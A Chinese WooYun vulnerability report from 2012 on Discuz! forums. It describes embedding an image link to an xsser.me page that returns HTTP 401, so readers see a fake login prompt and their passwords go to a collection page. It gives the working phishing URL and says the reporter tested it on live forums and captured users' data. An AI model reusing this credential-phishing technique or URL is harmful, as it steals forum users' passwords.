当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2012-015248

漏洞标题:当Discuz!遇上xsser.me

相关厂商:Discuz!

漏洞作者: imlonghao

提交时间:2012-11-25 13:15

修复时间:2012-11-30 13:16

公开时间:2012-11-30 13:16

漏洞类型:设计缺陷/逻辑错误

危害等级:中

自评Rank:10

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2012-11-25: 细节已通知厂商并且等待厂商处理中
2012-11-30: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

利用的是xsser.me的基础认证钓鱼,并成功钓到用户数据

详细说明:

当在Discuz中回帖,插入一张很奇葩的图片时,可能就会导致用户被盗号。

http://xsser.me/authtest.php?id=Ayuk1y&info=Please+Login+In++@360.cn


例如上面那个地址,可以用图片来引用之,然后回帖,当用户看到这张图片的时候,就会触发提示登陆框。
这个地址是一个401头
HTTP/1.1 401 Unauthorized
当输入密码后,会重定向到收集数据的页面,接着,你们密码就被盗了。
我为什么认为这个是一个漏洞:
1、用户网站大多都是提醒用户不要再站外输入自己的账号密码,但是,现在将代码插入到网站内部,用户有认为这是在网站内部,所以就输入了自己的密码。
2、经过试验,成功钓到了用户的数据
3、不仅仅是Discuz,需要网站都支持引用一张网络图片,并没有对图片的HTTP头进行检验。基础认证钓鱼很容易蔓延开来。。
4、之前的钓鱼过程是:黑客设立钓鱼页——通过短信息等传播这个地址——用户访问——用户受骗
而现在是:黑客在帖子中插入钓鱼信息——用户访问——用户受骗
显然,就少了一个非常繁琐的步骤。
例如,在一个论坛中,我将那个图片插在签名中,然后几乎每个帖子都去回复,然后,用户基本上就是去到哪里都能看到我的框框。。。。-,-然后后果你猜?!
(部分浏览器不支持)

漏洞证明:

以360论坛和吾爱破解论坛做了个试验。。。

0.png


1.png


2.png


3.png


4.png


6.png


5.png


修复方案:

你们看着办吧,我也想不到什么好的对策。。。

版权声明:转载请注明来源 imlonghao@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2012-11-30 13:16

厂商回复:

最新状态:

暂无